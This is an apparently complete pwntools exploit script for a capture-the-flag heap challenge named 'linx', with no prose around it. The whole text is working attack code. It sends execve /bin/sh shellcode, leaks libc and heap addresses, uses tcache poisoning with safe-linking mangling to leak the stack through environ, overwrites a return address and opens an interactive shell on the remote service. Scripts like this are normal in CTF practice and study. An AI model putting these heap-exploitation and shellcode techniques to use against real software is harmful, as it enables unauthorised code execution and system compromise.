1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 35 36 37 38 39 40 41 42 43 44 45 46 47 48 49 50 51 52 53 54 55 56 57 58 59 60 61 62 63 64 65 66 67 68 69 70 71 72 73 74 75 76 77 78 79 80 81 82 83 84 85 86 87 88 89 90 91 92 93 94 95 96 97 98 99 100 101 102 103 104 105 106 107 108 109 110 111 112 113 114 115 116 117 118 119 120 121 122 123 124 125 126 127 128 129 130 131 132 133 134 135 136 137 138 139 140 141 142 143 144 145 146 147 148 149 150 151 152 153 154 155 156 157 158 159 160 161 162 163 164 165 166 167 168 169 170 171 172 173 174 175 176 177 178 179 180 181 182 183 184 185 186 187 188 189 190 191 192 193 194 195 196 197 198 199 200 201 202 203 204 205 206 207 208 209 210 211 212 213 214 215 216 217 218 219 220 221 222 223 224 225 226 227 228 229 230 231 232 233 234 235 236 237 238 239 240 241 242 243 244 245 246 247 248 249 250 251 252 253 254
| from ctypes import CDLL from subprocess import Popen, PIPE from pwncli import * import sys from os import path import traceback import re
exe = path.join(path.dirname(__file__) or '.', 'linx_patched') context.bits = 64 context.arch = 'amd64' try: elf = context.binary = ELF(exe, checksec=False) except: elf = type('S',(),{'address':0})() try: libc = elf.libc except: libc = type('S',(),{'address':0})() context.log_level = 'info' context.terminal = ["tmux", "splitw", "-h", "-p", "65"]
gdbscript = ''' init-pwndbg dprintf malloc, "malloc(%zu)\\n", $rdi dprintf free, "free(%p)\\n", $rdi # b *read_int+83 # b *do_link+1568 c '''.format(**locals())
is_ipv4 = lambda s: len(s.split('.')) == 4 and all(p.isdigit() and 0 <= int(p) <= 255 for p in s.split('.')) is_domain = lambda s: all(part.isalnum() or part == '-' for part in s.split('.')) is_port = lambda s: s.isdigit() and 0 <= int(s) <= 65535 use_ip = lambda: len(sys.argv) >= 3 and (is_ipv4(sys.argv[1]) or is_domain(sys.argv[1])) and is_port(sys.argv[2])
def initialize(argv=[]): global pid update_checksec() if args.QEMU: if args.GDB: return process(["qemu-aarch64", "-g", "5000", "-L", "/usr/aarch64-linux-gnu", exe] + argv) else: return process(["qemu-aarch64", "-L", "/usr/aarch64-linux-gnu", exe] + argv) elif args.DOCKER: p = remote("localhost", 1092) sleep(1) return p elif args.REMOTE: context.log_level = 'debug' host, port = ("linx.challs.srdnlen.it", 1092) if len(sys.argv) < 4 else (sys.argv[2], int(sys.argv[3])) return remote(host, port, ssl=False) elif use_ip(): context.log_level = 'info' host, port = str(sys.argv[1]), int(sys.argv[2]) return remote(host, port, ssl=False) elif args.GDB: return gdb.debug([exe] + argv, gdbscript=gdbscript) else: return process([exe] + argv)
def execute(cmds, verbose=False): cmds = cmds if isinstance(cmds, list) else cmds.split() if verbose: sys.stdout.write("\n") sys.stdout.flush() p = Popen(cmds, stdout=PIPE, stderr=sys.stdout, text=True, bufsize=1) buf = [] for line in p.stdout: sys.stdout.write(line) sys.stdout.flush() buf.append(line) p.wait() return "".join(buf) else: p = Popen(cmds, stdout=PIPE, stderr=PIPE, text=True) out, err = p.communicate() return out if out else err
def open_split_tmux(cmd): cmd = cmd.split() if isinstance(cmd, str) else cmd execute(["tmux", "splitw", "-h", "-p", "65"] + cmd)
def debug(): global gdbscript, pid, g if ((not args.REMOTE and not args.GDB) or (args.QEMU and args.GDB)) and not use_ip(): if args.QEMU: open_split_tmux(["gdb"] + [a for c in filter(None, gdbscript.strip().splitlines()) for a in ["-ex", c.strip()]]) elif args.DOCKER: pid = process(["pgrep", "-fx", "/app/linx"]).recvall().strip().decode() gdb_pid, g = gdb.attach(int(pid), api=True, gdbscript=gdbscript, sysroot=f"/proc/{pid}/root", exe=exe.strip("_patched")) g.execute("directory /proc/{}/root/app".format(pid)) else: gdb_pid, g = gdb.attach(io, api=True, gdbscript=gdbscript) g.execute("directory /mnt/c/Users/ASUS/Documents/Linx")
def update_checksec(): marker = "CHECKSEC" fn = sys.modules[__name__].__file__ with open(fn, "r+", encoding="utf-8") as f: src = f.read() i = src.find(marker) i = src.find(marker, i + 1) i = src.find("\n", i) i = src.find("\n", i + 1) start = i + 1 end = src.find("\n", start) if end == -1: end = len(src) if src[start:end].strip() == "": output = execute(["checksec", "--file", exe]) commented = "".join(("# " + line + "\n") if line.strip() else "#\n" for line in output.splitlines()) src = src[:start] + commented + src[end:] f.seek(0); f.write(src); f.truncate()
s = lambda data :io.send(data) sa = lambda x, y :io.sendafter(x, y) sl = lambda data :io.sendline(data) sla = lambda x, y :io.sendlineafter(x, y) se = lambda data :str(data).encode() r = lambda delims :io.recv(delims) ru = lambda delims, drop=True :io.recvuntil(delims, drop) rl = lambda :io.recvline() uu32 = lambda data=None : u32((io.recvline().strip() if not data else data).ljust(4, b"\x00")) uu64 = lambda data=None : u64((io.recvline().strip() if not data else data).ljust(8, b"\x00")) info = lambda name,addr :log.info('{}: {}'.format(name, addr)) success = lambda name,addr :log.success('{}: {}'.format(name, addr)) l64 = lambda :u64(io.recvuntil("\x7f")[-6:].ljust(8,b"\x00")) l32 = lambda :u32(io.recvuntil("\xf7")[-4:].ljust(4,b"\x00")) ns = lambda p, data :next(p.search(data)) nsa = lambda p, instr :next(p.search(asm(instr, arch=p.arch)))
def menu(choice): """Select a menu option (1..4).""" sla(">> ", se(choice))
def insert_link(src, dst): """Insert a new link with given src and dst strings.""" link = f"[{src}]({dst})" menu(1) sla("Insert your link", b"[" + src + b"](" + dst + b")")
def unlink_link(link_string): """Unlink the exact link string previously added (full string match).""" menu(2) sla("Insert your link to be unlinked", link_string)
def show_links_and_get(): """Show links and return the block of output up to the end marker.""" menu(3)
def quit_menu(): """Exit the program via menu.""" menu(4)
def solve_hashcash(): """Solve the socaz PoW prompt and submit a valid stamp.""" banner = io.recvuntil(b"Result: ", timeout=5) if not banner: return
match = re.search(rb'Do Hashcash for (\d+) bits with resource "([^"]+)"', banner) if match is None: io.unrecv(banner) return
bits = int(match.group(1)) resource = match.group(2).decode() stamp = execute(["hashcash", f"-mCb{bits}", resource]).strip() info("Hashcash bits", bits) info("Hashcash resource", resource) success("Hashcash stamp", stamp) sl(stamp.encode())
def demangle(val): mask = 0xfff << 52 while mask: v = val & mask val ^= (v >> 12) mask >>= 12 return val
def mangle(heap_addr, val): return (heap_addr >> 12) ^ val
def exploit(x): global io io = initialize() if args.DOCKER or args.REMOTE or use_ip(): solve_hashcash() debug() sla("linking sauce:\n", b"\x90\x48\x31\xf6\x56\x48\xbf\x2f\x62\x69\x6e\x2f\x2f\x73\x68\x57\x54\x5f\x6a\x3b\x58\x99\x0f\x05") with log.progress("Leaking libc & heap address"), context.silent: for i in range(14): insert_link(f"S{i:02d}".encode(), f"D{i:02d}".encode()) unlink_link(b"S04") unlink_link(b"S06") insert_link(b"A"*0x81, b"C"*0x40) ru("A"*0x81) libc_leak = uu64(ru('"')) << 8 libc.address = libc_leak - 0x234c00 ru("C"*0x40) heap_addr = demangle(uu64(ru('"'))) info("Heap address", hex(heap_addr)) info("Libc address", hex(libc_leak))
with log.progress("Tcache poisoning to before environ to leak stack"), context.silent: unlink_link(b"S08") unlink_link(b"S09") unlink_link(b"S00") unlink_link(b"S07") insert_link(b"Z"*0x80 + p64(mangle(heap_addr, libc.sym["environ"] - 0x38))[:-2], b"Chill") insert_link(b"Y", b"C"*0x38) ru("C"*0x38) stack_leak = uu64(ru('"')) info("Environ address", hex(libc.sym["environ"]))
with log.progress("Overwrite the ret"), context.silent: unlink_link(b"S13") unlink_link(b"S12") unlink_link(b"S02") unlink_link(b"S11") insert_link(b"D"*0xa0 + p64(mangle(heap_addr, stack_leak - 0x158))[:-2], b"ll") insert_link(b"S", b"c"*8 + p32(0x1337001)) info("ELF base address", hex(elf.address)) if elf.address else None info("Libc base address", hex(libc.address)) if libc.address else None io.interactive() if not args.NOINTERACT else None
if __name__ == '__main__': global io for i in range(1): try: exploit(i) except Exception as e: sys.stderr.write(traceback.format_exc()) io.close()
|